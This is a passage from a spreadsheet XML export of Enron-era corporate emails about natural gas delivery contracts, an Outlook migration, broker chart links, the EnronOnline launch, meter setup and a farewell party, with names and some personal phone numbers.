and a clean bowling shirt can create a tacky appearance._x000D_
4. Though uncomfortable, say "yes" to socks and shoes for the occasion._x000D_
_x000D_
DRIVING ETIQUETTE:_x000D_
1. Dim your headlights for approaching vehicles, even if the gun's_x000D_
loaded and the deer's in sight._x000D_
2. When approaching a 4-way stop, the vehicle with the largest tires doesn't_x000D_
always have the right of way._x000D_
3. Never tow another car using panty hose and duct tape._x000D_
4. When sending your wife down the road with a gas can, it's impolite to ask_x000D_
her_x000D_
to bring back beer, too._x000D_
5. Don't lay rubber while traveling in a funeral procession._x000D_
_x000D_
_x000D_
_x000D_
 - pic22161.pcx </t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 09:11:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Topock Deliveries</t>
  </si>
  <si>
    <t xml:space="preserve">Anyone going to Mojave?  K._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lindberg, Lorraine  _x000D_
Sent:	Tuesday, October 09, 2001 11:10 AM_x000D_
To:	Watson, Kimberly; Lokay, Michelle; Lohman, TK; McConnell, Mark; Y'Barbo, Paul_x000D_
Subject:	Topock Deliveries_x000D_
_x000D_
FYI_x000D_
_x000D_
Pursuant to our conversation earlier today on the marketing strategy for incremental delivery capacity at SoCal Needles, Michelle and I researched the contracts with primary deliveries at PG&amp;E Topock.  Following is a list of the discounted rate shippers to Topock:_x000D_
_x000D_
PG&amp;E Trading_x000D_
40,000 MMBtu/d_x000D_
$0.10.75_x000D_
_x000D_
_x000D_
SMUD_x000D_
10,000 MMBtu/d_x000D_
$0.17_x000D_
_x000D_
(There are no shippers with EOC delivery points who would move their delivery point to Topock on a primary basis.)_x000D_
_x000D_
Attached is the contracted volume data for PG&amp;E Topock from Pipeline Profile._x000D_
_x000D_
_x000D_
 &lt;&lt; File: topock.xls &gt;&gt; _x000D_
_x000D_
Lorraine </t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 23:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tyler.theobald@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jan.moore@enron.com', 'vernon.mercaldo@enron.com', 'craig.buehler@enron.com', 'jim.wiltfong@enron.com', 'kay.threet@enron.com', 'michael.bodnar@enron.com', 'tk.lohman@enron.com', 'kevin.hyatt@enron.com', 'audrey.robertson@enron.com', 'penny.mccarran@enron.com', 'india.torres@enron.com', 'martha.janousek@enron.com', 'robert.mason@enron.com', 'sean.bolks@enron.com', 'pilar.ramirez@enron.com', 'dana.jones@enron.com', 'reyna.cabrera@enron.com', 'bob.burleson@enron.com', 'lee.ferrell@enron.com', 'kimberly.watson@enron.com', 'steven.harris@enron.com', 'stephen.herber@enron.com', 'sue.neville@enron.com', 'morgan.gottsponer@enron.com', 'don.powell@enron.com', 'steve.weller@enron.com', 'lorraine.lindberg@enron.com', 'michael.stage@enron.com', 'pallavi.goradia@enron.com', 'linda.wehring@enron.com', 'jeffery.fawcett@enron.com', 'theresa.branney@enron.com', 'michelle.lokay@enron.com', 'lindy.donoho@enron.com', 'jeanette.doll@enron.com'})</t>
  </si>
  <si>
    <t>Pre-Migration Tasks</t>
  </si>
  <si>
    <t>You are scheduled to be migrated on or about Feb 20.  Two tasks that we need _x000D_
you to accomplish before this date are....1. Create your Notes internet _x000D_
password and 2. Determine if you have Notes address book groups that need to _x000D_
be copied.  Setting your Notes internet password will allow you to see all _x000D_
your old notes messages after you are migrated to Windows 2000 (since only _x000D_
the last 30 days worth will be carried over to Outlook).  Copying your Notes _x000D_
address book groups will allow those groups to be carried over to Windows _x000D_
2000 as well.  The migration team will need to visit your desk while you are _x000D_
logged in to initiate the group copy.  All your business cards will _x000D_
automatically be migrated, so there is no other action required for them.  _x000D_
 Please reply and let me know when you have accomplished the following:_x000D_
Create Notes Internet Password Before Migration_x000D_
1. Go to your Notes Workspace_x000D_
2. Double click on Enron Address Book_x000D_
3. Under People search, type in your name, Highlight your name_x000D_
4. Double click to open_x000D_
_x000D_
_x000D_
5. Click on Edit Person_x000D_
6. Scroll down to Internet Password, type in password_x000D_
7. Click on Save and Close_x000D_
_x000D_
Do You Have Notes Address Book Groups?_x000D_
_x000D_
1.  Double-click on your "Address Book on Local" button_x000D_
_x000D_
_x000D_
2.  Select "Groups" in the left window_x000D_
3.  If you have any groups in addition to "LocalDomainServers" and _x000D_
"OtherDomainServers" then they will need to be copied over. (So let me know _x000D_
when you reply to this message) _x000D_
_x000D_
_x000D_
IMPORTANT!_x000D_
_x000D_
Reply back to this message and let me know that you've set your Notes _x000D_
Internet password, and also let me know if you have Notes address book groups _x000D_
that need to be copied. _x000D_
If you have any questions, feel free to ask those too. _x000D_
Thanks!_x000D_
_x000D_
:_______x000D_
  Tyler A Theobald_x000D_
      ETS Omaha IT_x000D_
      402-398-7247_x000D_
Help Desk: 402-398-7454_x000D_
__________________________________________________________________________</t>
  </si>
  <si>
    <t>Tue, 9 Jan 2001 23:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>daily charts and matrices as hot links 1/10</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by John Arnold/HOU/ECT on 01/10/2001 07:42 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
SOblander@carrfut.com on 01/10/2001 06:42:29 AM_x000D_
To: soblander@carrfut.com_x000D_
cc:  _x000D_
Subject: daily charts and matrices as hot links 1/10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0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Crude     http://www.carrfut.com/research/Energy1/crude82.pdf_x000D_
Natural Gas     http://www.carrfut.com/research/Energy1/ngas82.pdf_x000D_
Distillate     http://www.carrfut.com/research/Energy1/hoil82.pdf_x000D_
Unleaded     http://www.carrfut.com/research/Energy1/unlded82.pdf_x000D_
_x000D_
Nat Gas Strip Matrix_x000D_
http://www.carrfut.com/research/Energy1/Stripmatrix82.pdf_x000D_
Nat Gas Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixNG82.pdf_x000D_
_x000D_
Crude and Products Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixCL82.pdf_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 28 Oct 1999 09:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: EMP competition from Enron</t>
  </si>
  <si>
    <t xml:space="preserve"> This doesn't look like you were negotiating with us in good faith on_x000D_
Energy Marketplace......._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt; Enron Launches Global Web-Based Commodity Trading Site_x000D_
&gt; October 26, 1999 11:49 AM EDT_x000D_
&gt; HOUSTON, Oct. 26 /PRNewswire/ -- Enron (NYSE: ENE_x000D_
&gt; &lt;/v1?pcnexec=Browser/http://cgi.entrypoint.com/cgi-bin/ep_comp_link_articl_x000D_
&gt; es.cgi?location=www.entrypoint.com/stock/stock_summary.asp&amp;exc=usa::&amp;tkr=E_x000D_
&gt; NE&gt;) announced today the launch of EnronOnline, a global Internet-based_x000D_
&gt; transaction system for wholesale energy and other commodities. EnronOnline_x000D_
&gt; will allow participants to not only view commodity prices in real-time but_x000D_
&gt; also to directly transact with Enron over the Internet free of commission._x000D_
&gt; The transaction system will go live on Nov. 29, 1999, with the launch of_x000D_
&gt; North America natural gas to be followed by all other products over the_x000D_
&gt; next six weeks._x000D_
&gt; "EnronOnline offers customers the next level of wholesale energy_x000D_
&gt; transaction service by having easy and simple access to Enron's prices and_x000D_
&gt; products," said Jeffrey K. Skilling, president and COO of Enron. "This_x000D_
&gt; Internet system complements Enron's extensive marketing capabilities and_x000D_
&gt; gives our counterparties the choice of transacting over the telephone or_x000D_
&gt; instantly through our website."_x000D_
&gt; Enron's customers across the world will be able to access several hundred_x000D_
&gt; traded products through EnronOnline. The company will leverage its_x000D_
&gt; wholesale market expertise to publish real-time prices for power, natural_x000D_
&gt; gas, coal, weather products, liquids, petrochemicals, pulp and paper,_x000D_
&gt; emission credits and other commodities in the Americas, Europe and Asia._x000D_
&gt; It will continue expanding web-based commodity and product offerings_x000D_
&gt; globally._x000D_
&gt; "Unlike other Internet commodity service providers, EnronOnline doesn't_x000D_
&gt; match buyers with sellers," said Skilling. "Customers will be able to_x000D_
&gt; instantaneously conduct transactions directly with an Enron company as a_x000D_
&gt; principal."_x000D_
&gt; Real-time capabilities in the United States will be delivered wherever_x000D_
&gt; possible through Enron Communication, Inc.'s intelligent fiber optic_x000D_
&gt; network. This system is designed to combat web latency and create a true_x000D_
&gt; real-time environment online for Enron's customers._x000D_
&gt; A preview of the system is currently available at www.EnronOnline.com_x000D_
&gt; &lt;http://www.EnronOnline.com&gt;._x000D_
&gt; Enron is one of the world's leading electricity, natural gas and_x000D_
&gt; communications companies. The company, which owns approximately $34_x000D_
&gt; billion in energy and communications assets, produces electricity and_x000D_
&gt; natural gas, develops, constructs and operates energy facilities_x000D_
&gt; worldwide, delivers physical commodities and financial and risk management_x000D_
&gt; services to customers around the world, and is developing an intelligent_x000D_
&gt; network platform to facilitate online business. Enron's Internet address_x000D_
&gt; is www.enron.com &lt;http://www.enron.com&gt; and the stock is traded under the_x000D_
&gt; ticker symbol, "ENE."_x000D_
&gt;_x000D_
_x000D_
 - att-1.htm</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 11:29:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cora.pendergrass@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'james.simpson@enron.com', 'richard.tomaski@enron.com', 'l..mims@enron.com', 'geoff.storey@enron.com'})</t>
  </si>
  <si>
    <t>New Meters  and products on PGLC</t>
  </si>
  <si>
    <t>_x000D_
The basic reason we are changing meters in Sitara is because when PGLC was originally set up, the meters were set up using the same name as what the pipeline called them, i.e. NGPL/909265. This is the NGPL meter number NOT the PGLC meter number.  The PGLC Meter number is PGLC/NGPL.  The only reason we are doing this is so we can have everything correctly reflected so we can upload noms into pegasys with the meter number PGLC specifically used. _x000D_
_x000D_
The 3 products that will be in place for November at PGLC are:_x000D_
_x000D_
NBPL/Manhattan - this is where we are buying Northern Border Specific Gas to take to PGLC at the NBPL/Peoples/82 (Manhattan transfer point).  We will then have a meter bounce ticket to take it from NBPL/PGLC/82 to PGLC/NBPL/NB01 and take it into our pool._x000D_
_x000D_
NGPL/Peoples - this is where we are buying NGPL specific gas to take to PGLC at the NGPL/Peoples/909285 Meter.  We will then have a meter bounce ticket to take it from NGPL/Peoples/909285 to PGLC/NGPL/NGPL and take it into our pool._x000D_
_x000D_
CHI Peoples - this is where we are buying pool gas at PGLC at the TTP pool. - this is the product that has been out there but all deals will be mapped to the TTP point. THis is where the majority of customers give us our gas._x000D_
_x000D_
_x000D_
The only time we will be using the meter PGLC/NGPL/NGPL, PGLC/NBPL/NB01, PGLC/ANR/ANR,  and other PGLC/pipeline specific meters is when gas is actually being delivered on a contract into the gate.  For the most part all of our gas will be at meter PGLC/TTP/TTP._x000D_
_x000D_
_x000D_
Thanks!!_x000D_
_x000D_
Cora</t>
  </si>
  <si>
    <t>Fri, 1 Oct 1999 10:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.ingersoll@enron.com', 'rogers.herndon@enron.com', 'lloyd.will@enron.com', 'elizabeth.sager@enron.com', 'joe.hartsoe@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>My/Kevin's Revised SERC/TVA Agreement</t>
  </si>
  <si>
    <t>Attached is Kevin and my suggestions to TVA's changes we received Friday _x000D_
late.  We are supposed to call Steve Whitley Monday am.  Call me with _x000D_
comments.   Use LAUNCH to see the redlines (TVA) and bluelines (enron).</t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 13:36:55 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stephanie.erwin@enron.com'})</t>
  </si>
  <si>
    <t>NYPA</t>
  </si>
  <si>
    <t>Chris,_x000D_
_x000D_
I remember you mentioning us getting together sometime in the near future so that you could explain the whole NYPA deal.  Now that bid week is over, my time is pretty flexible.  Let me know a good time for you._x000D_
_x000D_
Thanks,_x000D_
Stephanie Erwin</t>
  </si>
  <si>
    <t>Thu, 9 Aug 2001 10:12:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>Resume - Tyler Cutshall</t>
  </si>
  <si>
    <t xml:space="preserve">A friend of mine that I've known since college at Harding is looking for a_x000D_
job in IT or consulting._x000D_
_x000D_
His last stint was as a Senior Systems Engineer in Compaq's SAP Solutions_x000D_
Center._x000D_
_x000D_
He's a stellar guy, and very smart, as you can tell from his resume._x000D_
_x000D_
If you know of any opportunities, please pass this along._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ram Tackett_x000D_
Owner, Abacus Technologies_x000D_
17611 Loring Lane, Spring, TX 77388-5746_x000D_
mailto:rtackett@abacustech.net_x000D_
v: (281)651-7106_x000D_
f: 1+(281)528-8636_x000D_
Web: http://www.abacustech.net_x000D_
_x000D_
 - Resume.doc </t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 00:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Intergen/Coral transaction</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  _x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 12/20/2000 08:57 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Fred Mitro@ECT_x000D_
12/19/2000 06:34 PM_x000D_
To: Randy Petersen/HOU/ECT@ECT_x000D_
cc: Ben Jacoby/HOU/ECT@ECT, Kay Mann/Corp/Enron@Enron, Lisa _x000D_
Bills/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Intergen/Coral transaction_x000D_
_x000D_
Randy:_x000D_
_x000D_
As I indicated in my voicemail, Coral has requested that Intergen (or its _x000D_
designated project affiliate - Sweetgum Energy L.P.) be the counterparty that _x000D_
transacts with Enron.  Based on current information, the structure of the _x000D_
transaction has not materially changed from the Coral deal structure _x000D_
described in the 11/30/00 DASH.  Intergen is holding a Board meeting this _x000D_
afternoon and the proposed transaction is on the agenda for approval._x000D_
_x000D_
With regard to the timing of the funding, it is my understanding that once _x000D_
the Letter Agreement has been executed (target date: 12/21) and associated _x000D_
documents accepted by Intergen, Enron will notify TurboPark of its intention _x000D_
to assign the equipment to Intergen (target notice date: 12/22).  Once the _x000D_
assignment documents are ready for execution, Intergen will fund the _x000D_
transaction and Enron will execute the assignment documents immediately after _x000D_
receiving written confirmation that Enron has received the transaction _x000D_
proceeds.  There is a desire by East Origination to, if possible, book the _x000D_
earnings from this transaction in fiscal year 2000._x000D_
_x000D_
Rebecca Walker (ENA development) is planning to run a D&amp;B report on Sweetgum _x000D_
Energy L.P.  tomorrow once she receives the State and Headquarters _x000D_
information necessary.  I traded voicemails with Ben Glisan today on this _x000D_
counterparty change.  He asked that I work with RAC deal personell on this _x000D_
matter. _x000D_
_x000D_
Based upon your voicemail it appears that we do not need to amend the DASH _x000D_
based upon this change in counterparty.  Let me know if any of the above _x000D_
information changes your opinion.  _x000D_
_x000D_
Call me if you wish to discuss this information._x000D_
_x000D_
Thanks,_x000D_
Fred Mitro_x000D_
x35406_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 13:30:24 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Farewell Drinks</t>
  </si>
  <si>
    <t xml:space="preserve">Your leaving Friday? =20_x000D_
_x000D_
-----Original Message-----_x000D_
From: Guerrero, Janel=20_x000D_
Sent: Tuesday, November 27, 2001 10:56 AM_x000D_
To: Friesenhahn, Shelly; Vegas, Dennis; Allen, Margaret; Scheuer, Janelle; =_x000D_
Keeler, Jeff; Abramo, Caroline; Ambler, John; Andrews, Jeff; Bachmeier, Ric=_x000D_
k; Bagwell, Jennifer J; Beach, Gentry; Belden, Tim; Benevides, Dennis; Brig=_x000D_
gs, Tom; Brockwell, Jennifer; Castano, Marianne; Catherine McKalip Thompson=_x000D_
 (E-mail); Childers, Courtney; Childress, Allen B.; Cohagan, Fred; Cowan, B=_x000D_
eth; Hamb, Edward; Heffernan, Amy; Herndon, Rogers; Hess, Ryan; Hinrichs, L=_x000D_
ance; Iannarone, Lauren; Jacoby, Ben; Loosley, David; Lorenz, Matt; Loukani=_x000D_
s, Linda K.; Schultz, Michelle; Mayer, Laurie; Mayes, Tomasine; Mixon, Mark=_x000D_
; 'borourke@reliant.com'; Nettelton, Marcus; Nemec, Gerald; Pagan, Ozzie; P=_x000D_
resto, Kevin M.; Delainey, David W._x000D_
Subject: FW: Farewell Drinks_x000D_
_x000D_
_x000D_
Friends, when Lara and I worked on this invite list I was at the airport tr=_x000D_
ying to catch an international flight.  Consequently, we missed a few names=_x000D_
.  Please see the message below and join us for farewell drinks on Thursday=_x000D_
. =20_x000D_
=20_x000D_
-----Original Message-----_x000D_
From: Leibman, Lara=20_x000D_
Sent: Monday, November 26, 2001 7:52 AM_x000D_
To: Shapiro, Richard; Steffes, James D.; Dernehl, Ginger; McVicker, Maureen=_x000D_
; Kean, Steven J.; Linnell, Elizabeth; Binns, Darran; O'connell, Earlene; S=_x000D_
ullivan, Kathleen; Ibrahim, Amr; Petrochko, Mona L.; Gottfredson, Bryan; Do=_x000D_
lezal, Regan; Enochs, Fred; Racicot, Paul; Garrett, Bryan; Phillips, George=_x000D_
; Philipp, Meredith; Denne, Karen; Palmer, Mark A. (PR); Palmer, Sarah; Cla=_x000D_
rk, Mary; Votaw, Courtney; Schmidt, Ann M.; Richter, Brad; Piper, Greg; Wou=_x000D_
lfe, Greg; Frey, Gunnar; La, Nicole; Marshall, Lucy; Fallon, Jim; Edison, S=_x000D_
usan; Sidler, Shirley; Zimmerman, Grant; Schneider, Richard; Barnes, Corbin=_x000D_
; Harris, Michael; Santikos, Mark; Harkness, Cynthia; Hicks, Michelle; Ross=_x000D_
i, Robbi; Gardner, Wayne; Gartner, Julie S.; Gresham, Wayne; Mcgowan, Kevin=_x000D_
; Hochschild, Lenny; Wilhite, Jane; Clayton, Paul; Puchot, Paul; Koogler, D=_x000D_
avid; Madaras, Tom; McDonald, Rob; Heintzelman, Pete; Arnold, Matthew; Arno=_x000D_
ld, John; Noble, Ted; Korioth, Ann; Tobor, Rachael; Kalmans, Elyse; Olson, =_x000D_
Cindy; Shankman, Jeffrey A.; Reck, Daniel; Metcalf, Kellie; Charvel, Ricard=_x000D_
o; Brown, Jeff; Bolton, Stacey; Huson, Maggy; Perez, Carmen; Nord, Sue; Rey=_x000D_
na, Margo; Barnes, Lynnette; Lawrence, Linda L.; Noske, Linda J.; Yeung, Ch=_x000D_
arles; Burns, Stephen; Robertson, Linda; Hartsoe, Joe; Hardy Jr, John; Rizz=_x000D_
o, Helen; Hawkins, Bernadette; Novosel, Sarah; Fulton, Donna; Cooney, Carol=_x000D_
yn; Sullivan, Lora; Long, Chris; Buerger, Rubena; Kingerski, Harry; Keene, =_x000D_
Patrick; Ogenyi, Gloria; Frank, Robert; Neustaedter, Robert; Pharms, Melind=_x000D_
a; Moore, Bill; Allen, Joe; Mara, Susan; Dasovich, Jeff; Montovano, Steve; =_x000D_
Migden, Janine; Rishe, Frank; Ferlic, Suzanne; Reinfeld, David; Spector, Br=_x000D_
ian; Seeligson, Stewart; Woody, Rus; Manuel, Scott; Jachimiak, Matthew; She=_x000D_
ldon, Steven; Kaufman, Paul; Perlman, Beth; Wenz, Michelle; Lindberg, Susan=_x000D_
; Roan, Michael; Nicolay, Christi L.; Warner, Geriann; Alamo, Joseph; Lawne=_x000D_
r, Leslie; Allegretti, Daniel; Boston, Roy; Hueter, Barbara A.; Stroup, Ker=_x000D_
ry; Jacobson, Lisa; Baxter, Ashley; Pollock, Adam; Pagan, Ozzie; Lewis, Wil=_x000D_
liam Patrick; Bradley, Rob; Benson, Eric; Hemstock, Robert; Chapman, Tom; H=_x000D_
etrick, Nancy; Fromer, Howard; Floris, Vinio; Levy, Alberto; Kishigami, Kik=_x000D_
umi; Knight, Laurie; Landwehr, Susan M.; Mangskau, David; Hamilton, Allison=_x000D_
; Palmer, Germain; Robinson, Marchris; Stransky, Joan; Hartfield, Rita; Twi=_x000D_
ggs, Thane; Letzerich, Palmer; Watanabe, Luiz; Walton, Steve; Grimes, Micha=_x000D_
el; Grant, Fiona; Stephens, Sharonda; Perez, Gus; Sarkissian, Arshak; Suare=_x000D_
z, John; Cantrell, Rebecca W.; Burton, Katrina; Miles, Andrew; Arnell, Doug=_x000D_
; Marvin, Michele Nezi; Wapner, Beth; Estrada, Roger; Masani, Zal; Hill, Jo=_x000D_
 Ann; Thome, Jennifer; Thome, Stephen; Costello, Zachary; Commons, Matthew;=_x000D_
 Hilgert, Chris; Lebeau, Paul; Walt, John; Warner, Traci; Lemmons Jr., Bill=_x000D_
y; Reichelderfer, Thomas; Magruder, Kathleen; Merola, Becky; Derecskey, Cin=_x000D_
dy; Williams, Robert C.; Parks-Foutch, Michelle; Edison, Andrew; Corman, Sh=_x000D_
elley; King Jr., Frazier; Baker, Marilyn N; Barbarawi, Moe; Betzer, Evan; L=_x000D_
eff, Dan; Maurer, Luiz; Cross, Edith; Mainzer, Elliot; Martin, Amanda; Mata=_x000D_
moros, Joseph; Mcconnell, Mike; Siegel, Misha; Schwartz, Laura; Taylor, Gar=_x000D_
y; Andraca, Marc; Snyder, Brad J.; Capestany, Mari; Wagner, Joseph; Lewis, =_x000D_
James W.; Persson, Roger; Baukney, Scott; Aucoin, Berney C. ; Golden, Jeff;=_x000D_
 Brown, Michael (EES); Massey II, John; Woods, Trevor; Ferrara, Julie; Gilb=_x000D_
ert-smith, Doug; Coulter, Kayne; Dean, Clint; Pizzolato, Paul; Litton, Todd=_x000D_
; McCaffrey, Deirdre; Konur, Sanjay; Wagner, Vincent; Gupta, Gautam; Mulhol=_x000D_
land, Sarah; Rigney, Brandon; Reagor, Rodney; Huertas, Alfredo; Canovas, Gu=_x000D_
illermo; Alvarez, Ray; Bestard, Jose; Comnes, Alan; Ingersoll, Richard; Hoa=_x000D_
tson, Tom; Shelk, John; Shortridge, Pat; Staines, Dan; Ryall, Jean; Haizman=_x000D_
n, Jan; Wilson, Angela; Duffy, Matthew; Kimberly, Kelly; James, Terrie; Cur=_x000D_
ran, Greg; Sharp, Vicki; Buchanan, Harold; Van Gelder, John; Van Chau, Mich=_x000D_
ael; Felix, Bob; Franz, Kathy; Caplan, Ilan; Mansfield, Shelly; Vann, Suzan=_x000D_
ne_x000D_
Cc: Guerrero, Janel; Leibman, Lara_x000D_
Subject: Farewell Drinks_x000D_
_x000D_
_x000D_
As our last day is Friday, November 30th, we would love to toast the good t=_x000D_
imes and special memories that we have shared with you over the past five y=_x000D_
ears.  Please join us at Teala's (W. Dallas) on Thursday, November 29th, be=_x000D_
ginning at 5pm. =20_x000D_
=20_x000D_
Looking forward to being with you,_x000D_
=20_x000D_
Lara and Janel_x000D_
=20_x000D_
=20_x000D_
Lara Leibman_x000D_
713.851.7770 (cellular)_x000D_
713.528.5281 (home)_x000D_
lleibman@houston.rr.com &lt;mailto:lleibman@houston.rr.com&gt;_x000D_
=20_x000D_
Janel Guerrero_x000D_
713.851.3778 (cellular)_x000D_
713.524.1534 (home)_x000D_
travelgirl_janel@hotmail.com &lt;mailto:travelgirl_janel@hotmail.com&gt;_x000D_
=20_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 09:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Mike_x000D_
_x000D_
Take a look at this_x000D_
_x000D_
http://www.pbs.org/newshour/newshour_index.html#_x000D_
_x000D_
and go to Paul Solman's report on gas prices._x000D_
There is a video capsule of El Paso weather report._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2001 23:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'darla.saucier@enron.com'})</t>
  </si>
  <si>
    <t>Re: Oglethorpe</t>
  </si>
  <si>
    <t xml:space="preserve">I'm here for you.  Just remember me favorably when you become my boss _x000D_
someday.  I fetch coffe and pop, I always keep a stash of crackers,... the _x000D_
list goes on._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Darla Saucier@ENRON_x000D_
01/23/2001 04:41 PM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Oglethorpe  _x000D_
_x000D_
sorry Chris, I know you already sent this to me.  I got lost here for a _x000D_
moment between the Nov corrections and the Dec invoice._x000D_
_x000D_
_x000D_
Thanks for your help!_x000D_
Darla_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 06:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'liz.bellamy@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Liz, _x000D_
_x000D_
Do you want to take this on?_x000D_
_x000D_
D_x000D_
---------------------- Forwarded by Daren J Farmer/HOU/ECT on 02/05/2001 _x000D_
02:36 PM ---------------------------_x000D_
_x000D_
_x000D_
	Invitation_x000D_
Chairperson: Terry Sanvido_x000D_
_x000D_
Start: 02/08/2001 02:00 PM_x000D_
End: 02/08/2001 03:00 PM_x000D_
_x000D_
Description: Sitara Reporting mtg in 2556_x000D_
_x000D_
_x000D_
_x000D_
This meeting repeats   starting on    (if the date occurs on a weekend the _x000D_
meeting )._x000D_
Meeting Dates: _x000D_
_x000D_
_x000D_
_x000D_
Dana Docherty/NA/Enron_x000D_
Sylvia A Campos/HOU/ECT_x000D_
Julie Meyers/HOU/ECT_x000D_
David Baumbach/HOU/ECT_x000D_
Kam Keiser/HOU/ECT_x000D_
George D Smith/NA/Enron_x000D_
Edward Terry/HOU/ECT_x000D_
Kevin Heal/CAL/ECT_x000D_
Victor Lamadrid/HOU/ECT_x000D_
Patti Sullivan/HOU/ECT_x000D_
Kathryn Bussell/HOU/ECT_x000D_
Hunter S Shively/HOU/ECT_x000D_
Tori Kuykendall/HOU/ECT_x000D_
Karen Politsky/CAL/ECT_x000D_
Chris Germany/HOU/ECT_x000D_
Scott Goodell/Corp/Enron_x000D_
Mark McClure/HOU/ECT_x000D_
Daren J Farmer/HOU/ECT_x000D_
Randall L Gay/HOU/ECT_x000D_
Katherine L Kelly/HOU/ECT_x000D_
Bryce Baxter/HOU/ECT_x000D_
Stacey Richardson/HOU/ECT_x000D_
Debbie R Brackett/HOU/ECT_x000D_
_x000D_
Detailed description:_x000D_
Discuss new reporting requirements_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Jul 1999 04:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'raislerk@sullcrom.com', 'gilbergd@sullcrom.com'})</t>
  </si>
  <si>
    <t>Registration Process Questions</t>
  </si>
  <si>
    <t xml:space="preserve">It turns out that quite a bit has been happening without us so we may be _x000D_
inundated with information over the next day or so.  Let me know if the _x000D_
message below does not come through in color since it will be difficult to _x000D_
decipher._x000D_
_x000D_
Louise is quite anxious to finalize the ETA, PA and Read-only PA and I _x000D_
explained that we were still waiting for the proposed changes from London.  _x000D_
Knowing Louise I have a feeling we may see that stuff soon._x000D_
_x000D_
Since we seem to be a bit behind schedule, Louise agreed that an all-hands _x000D_
legal meeting next week might be premature and she is contacting the London _x000D_
team to discuss scheduling.  I'll let you know as soon as I have anything _x000D_
more to report on the calendar._x000D_
_x000D_
Mark_x000D_
---------------------- Forwarded by Mark - ECT Legal Taylor/HOU/ECT on _x000D_
07/13/99 11:51 AM ---------------------------_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
07/13/99 11:00 AM_x000D_
To: Mark - ECT Legal Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Registration Process Questions_x000D_
_x000D_
You may want to forward this to Sullivan and Cromwell_x000D_
---------------------- Forwarded by Louise Kitchen/LON/ECT on 07/13/99 05:02 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
07/05/99 06:23 PM_x000D_
To: Elena Kapralova/LON/ECTRobert Campbell/LON/ECT@ECT, Rahil _x000D_
Jafry/LON/ECT@ECT, David Port/LON/ECT@ECT, Mark Dilworth/LON/ECT@ECT, Paul _x000D_
Goddard/LON/ECT@ECT, Justin Boyd/LON/ECT@ECT, Janine Juggins/LON/ECT@ECT, _x000D_
Mark - ECT Legal Taylor/HOU/ECT@ECT, Jay Webb/HOU/ECT@ECT, Robert _x000D_
Campbell/LON/ECT@ECT, Timothy.Hughes@cliffordchance.com, _x000D_
Andrew.Wilkinson@cliffordchance.com, Scott Sefton/LON/ECT@ECT, Edmund _x000D_
Cooper/LON/ECT@ECT, David G Mally/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Registration Process Questions  _x000D_
_x000D_
Let's be clear about all of the confusion which took place last week on how _x000D_
to register,  this is what we are doing.  Any comments or problems please _x000D_
reply.  I have tried to address everyone's points (see end of email).  _x000D_
_x000D_
1.  Current Customers_x000D_
_x000D_
We are going to pre-register a large number of customers prior to the _x000D_
launch.   These customers will not  receive any documentation from us apart _x000D_
from the one page application form (Password Application) and a nice glossy _x000D_
marketing brochure._x000D_
_x000D_
They will not be asked to fill in any form of registration documentation.  _x000D_
All of the approvals should be done internally as we already trade with these _x000D_
people._x000D_
_x000D_
Procedure_x000D_
1.  A list of customers to be pre-registered is compiled._x000D_
2.  Sign off on the list is obtained from Tax, Credit, Legal etc._x000D_
3. The customer receives from Enron a Password Application Form (postal) and _x000D_
a marketing brochure (this will be very glossy with only high level details _x000D_
nothing specific to the customer but will outline the registration process _x000D_
(to include whether to send to UK os  US office).  The PA will be specific to _x000D_
